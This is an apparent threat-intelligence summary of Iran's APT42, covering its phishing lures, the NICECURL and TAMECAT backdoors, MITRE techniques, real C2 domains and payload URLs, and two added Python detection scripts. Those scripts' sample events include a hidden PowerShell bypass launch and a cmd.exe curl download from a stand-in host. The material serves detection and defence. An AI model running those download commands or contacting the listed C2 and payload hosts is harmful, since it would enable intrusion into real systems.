APT42, an Iranian state-sponsored actor linked to the IRGC-IO, uses enhanced social engineering and cloud-targeting operations to harvest credentials and access Microsoft 365 environments, while deploying the custom backdoors NICECURL and TAMECAT to exfiltrate data and maintain a foothold. The activity overlaps with other Iran-nexus groups and includes multiple credential-harvesting clusters, MFA bypass attempts, and defense-evasion techniques intended to evade detection. #APT42 #IRGC_IO #NICECURL #TAMECAT #Microsoft365
Key points
- APT42 is an Iranian state-sponsored actor (associated with IRGC-IO) targeting NGOs, media, academia, legal services, and activists.
- The group uses social engineering, posing as journalists and event organizers, to harvest credentials and gain initial access to cloud environments.
MITRE Techniques
- [T1566.002] Phishing – Spearphishing Link – Used to harvest credentials via phishing URLs masquerading as legitimate articles; “Malicious links from typo-squatted domains that are masquerading as news articles likely sent via spear phishing, redirecting the user to fake Google login pages.”
- [T1078] Valid Accounts – Harvested credentials used to gain initial access to cloud environments; “harvest credentials and use them to gain initial access to cloud environments.”
- [T1071.001] Web Protocols – C2 over HTTP – Backdoors communicate with their C2 node via HTTP.
- [T1567.002] Exfiltration to Cloud Storage – Exfiltrated documents to a OneDrive account masquerading as the victim’s organization.
- [T1047] WMI – Used to query anti-virus products during TAMECAT execution; “Windows Management Instrumentation (WMI) to query anti-virus products running on the victim’s system.”
- [T1059.005] VBScript – NICECURL is a VBScript-based backdoor; “NICECURL backdoor written in VBScript that can download additional modules…”
- [T1059.001] PowerShell – TAMECAT is a PowerShell toehold; “a PowerShell toehold that can execute arbitrary PowerShell or C# content.”
- [T1059.003] Windows Command Shell – During TAMECAT execution, the script launches cmd.exe to run a curl command.
- [T1105] Ingress Tool Transfer – Downloads additional modules and content for execution (NICECURL/TAMECAT chains).
- [T1027.001] Obfuscated/Encrypted Files – The TAMECAT backdoor payload is obfuscated and AES-encrypted.
- [T1036] Masquerading – Posing as NGOs, “Mailer Daemon,” and Bitly URL shortening services to disguise activity.
- [T1070] Indicator Removal on Host – Clearing Chrome browser history as a defense-evasion move.
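The execution chain in the technique list (a PowerShell toehold that runs curl via cmd.exe and queries installed anti-virus products through WMI) is easier to detect as a process-lineage pattern than as individual command lines. The following is an added example, not code from the summary or from the linked report: it walks constructed process-creation events, resolves each process's ancestry, and flags the two behaviours. Event field names, file paths and URLs are assumptions; the root/SecurityCenter2 AntiVirusProduct class is the standard WMI location for anti-virus inventory and is not named on the page.

```python
"""Detect the TAMECAT-style execution chain described in the technique list.

Added example, not part of the original summary or the linked report.
Events are constructed process-creation records; the field names are an
assumption, not a specific EDR or Sysmon schema.
"""
import re

# Constructed process-creation events: pid, parent pid, image path, command line.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -w hidden -ep bypass -f C:\Users\Public\stage.ps1"},
    # cmd.exe spawned by the PowerShell toehold to run curl (T1059.003 + T1105)
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c curl -s https://example.invalid/df32s.txt -o %TEMP%\\df32s.txt"},
    # WMI query for anti-virus products (T1047); namespace/class are standard WMI, not from the page
    {"pid": 400, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct"},
    # benign: cmd.exe without curl, parent is explorer
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c dir"},
    # benign: curl launched directly by the user, no PowerShell ancestor
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -O https://updates.example.org/patch.msi"},
]


def basename(path: str) -> str:
    """Lower-case file name of an image path, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestors(pid: int, by_pid: dict):
    """Yield image basenames of all ancestors of pid, nearest first (cycle-safe)."""
    seen = set()
    e = by_pid.get(pid)
    while e and e["ppid"] in by_pid and e["ppid"] not in seen:
        seen.add(e["ppid"])
        e = by_pid[e["ppid"]]
        yield basename(e["image"])


def detect(events):
    """Return (rule, pid) tuples for events matching either behaviour."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        name = basename(e["image"])
        cmdline = e["cmdline"].lower()
        lineage = list(ancestors(e["pid"], by_pid))
        # curl run either as its own image or inside a cmd.exe command line
        uses_curl = name == "curl.exe" or (name == "cmd.exe" and re.search(r"\bcurl\b", cmdline))
        # checking the whole ancestry (not just the direct parent) also catches
        # curl.exe that cmd.exe spawns as a separate process under PowerShell
        if uses_curl and "powershell.exe" in lineage:
            hits.append(("powershell-spawned curl download (T1059.003/T1105)", e["pid"]))
        if re.search(r"antivirusproduct|securitycenter2", cmdline):
            hits.append(("WMI anti-virus product query (T1047)", e["pid"]))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"pid {pid}: {rule}")
```

On the constructed events this flags pid 300 (cmd.exe running curl under a PowerShell ancestor) and pid 400 (the AntiVirusProduct query), and leaves the two benign processes alone. Matching on full ancestry rather than the immediate parent is the design choice that matters: a curl.exe child of cmd.exe would otherwise slip through.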
Indicators of Compromise
- [Domain] C2/phishing domain hosted on the glitch[.]me platform: accurate-sprout-porpoise[.]glitch[.]me – context: C2 domain used by TAMECAT
- [Domain] Typosquatted news domain: washinqtonpost[.]press – context: typosquatted masquerade domain used as a lure in Cluster A
- [Domain] Bitly/shortener domain used in lures: bitly[.]org[.]il – context: masquerading as Bitly in Cluster C
- [Domain] Other C2/domain: worried-eastern-salto[.]glitch[.]me – context: C2-related domain
- [URL] hxxp://s3[.]tebi[.]io/icestorage/nconf.txt – context: download URL for TAMECAT delivery chain
- [URL] hxxps://s3[.]tebi[.]io/icestorage/df32s.txt – context: AES decryption script URL for TAMECAT
- [MD5] 347b273df245f5e1fcbef32f5b836f1d – context: NICECURL sample MD5
- [MD5] 2f6bf8586ed0a87ef3d156124de32757 – context: NICECURL sample decoy file
- [MD5] 13aa118181ac6a202f0a64c0c7a61ce7 – context: encrypted RAR decoy file associated with NICECURL
- [MD5] 081419a484bbf99f278ce636d445b9d8 – context: MD5 for the nconf.txt PowerShell script
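The indicator list above is defanged (hxxp, [.]), so it cannot be matched against logs as written. The following is an added example, not code from the summary or from the linked report: it refangs the domain and URL indicators, matches URL indicators on host plus path so http and https variants both hit, and adds an edit-distance check that catches near-miss spellings of a brand the way washinqtonpost[.]press mimics washingtonpost. The proxy log lines, the allowlisted brand hosts and the wash1ngtonpost.example lookalike are constructed for the demo.

```python
"""Scan constructed proxy log lines against the defanged IoCs listed above.

Added example, not part of the original summary or the linked report.
Log lines and the lookalike host are constructed; the IoC strings are
copied from the list above in their defanged form.
"""
import re
from urllib.parse import urlparse

# Domain IoCs from the list above, kept defanged so the file is safe to paste around.
DOMAIN_IOCS = [
    "accurate-sprout-porpoise[.]glitch[.]me",
    "worried-eastern-salto[.]glitch[.]me",
    "washinqtonpost[.]press",
    "bitly[.]org[.]il",
]
# URL IoCs from the list above; matched on host+path so http/https variants both hit.
URL_IOCS = [
    "hxxp://s3[.]tebi[.]io/icestorage/nconf.txt",
    "hxxps://s3[.]tebi[.]io/icestorage/df32s.txt",
]
# Brand whose lookalikes are flagged, with its legitimate hosts (assumption for the demo).
BRAND = "washingtonpost"
ALLOWED_HOSTS = {"washingtonpost.com", "www.washingtonpost.com"}


def refang(s: str) -> str:
    """Turn hxxp:// and [.] back into a real scheme and dots for matching."""
    s = re.sub(r"^hxxp", "http", s, flags=re.I)
    return s.replace("[.]", ".").replace("[:]", ":").lower()


def norm_url(url: str) -> str:
    """Scheme-agnostic key for a URL: hostname plus path."""
    p = urlparse(url)
    return f"{p.hostname}{p.path}"


WATCH_HOSTS = {refang(d) for d in DOMAIN_IOCS}
WATCH_URLS = {norm_url(refang(u)) for u in URL_IOCS}


def levenshtein(a: str, b: str) -> int:
    """Edit distance; catches one-character typosquats such as the q-for-g swap."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike(host: str):
    """Return BRAND if any DNS label is within 2 edits of it and host is not allowlisted."""
    if host in ALLOWED_HOSTS:
        return None
    for label in host.split("."):
        if levenshtein(label, BRAND) <= 2:
            return BRAND
    return None


# Constructed proxy log lines: timestamp, client IP, method, URL, status.
LOG_LINES = [
    "2024-05-01T10:01:02Z 10.0.0.5 GET https://www.washingtonpost.com/politics/ 200",
    "2024-05-01T10:03:11Z 10.0.0.5 GET https://washinqtonpost.press/article/123 200",
    "2024-05-01T10:05:40Z 10.0.0.7 GET https://s3.tebi.io/icestorage/nconf.txt 200",
    "2024-05-01T10:06:02Z 10.0.0.7 POST https://accurate-sprout-porpoise.glitch.me/beacon 200",
    "2024-05-01T10:07:15Z 10.0.0.9 GET https://bitly.org.il/x9f2 302",
    "2024-05-01T10:08:00Z 10.0.0.9 GET https://docs.example.org/report.pdf 200",
    "2024-05-01T10:09:30Z 10.0.0.9 GET https://wash1ngtonpost.example/login 200",
]


def scan(lines):
    """Return (reason, indicator) tuples; exact IoC hits take precedence over lookalikes."""
    alerts = []
    for line in lines:
        m = re.search(r"\s(https?://\S+)\s", line)
        if not m:
            continue
        url = m.group(1).lower()
        host = urlparse(url).hostname or ""
        if norm_url(url) in WATCH_URLS:
            alerts.append(("url_ioc", norm_url(url)))
        elif host in WATCH_HOSTS:
            alerts.append(("host_ioc", host))
        else:
            brand = lookalike(host)
            if brand:
                alerts.append((f"lookalike:{brand}", host))
    return alerts


if __name__ == "__main__":
    for reason, indicator in scan(LOG_LINES):
        print(f"{reason:25} {indicator}")
```

Keeping domain and URL indicators in separate sets is deliberate: s3[.]tebi[.]io is a shared storage host, so only the full host-plus-path from the URL indicators is matched for it, while the glitch[.]me subdomains and the lure domains are matched on host alone.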
Read more: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations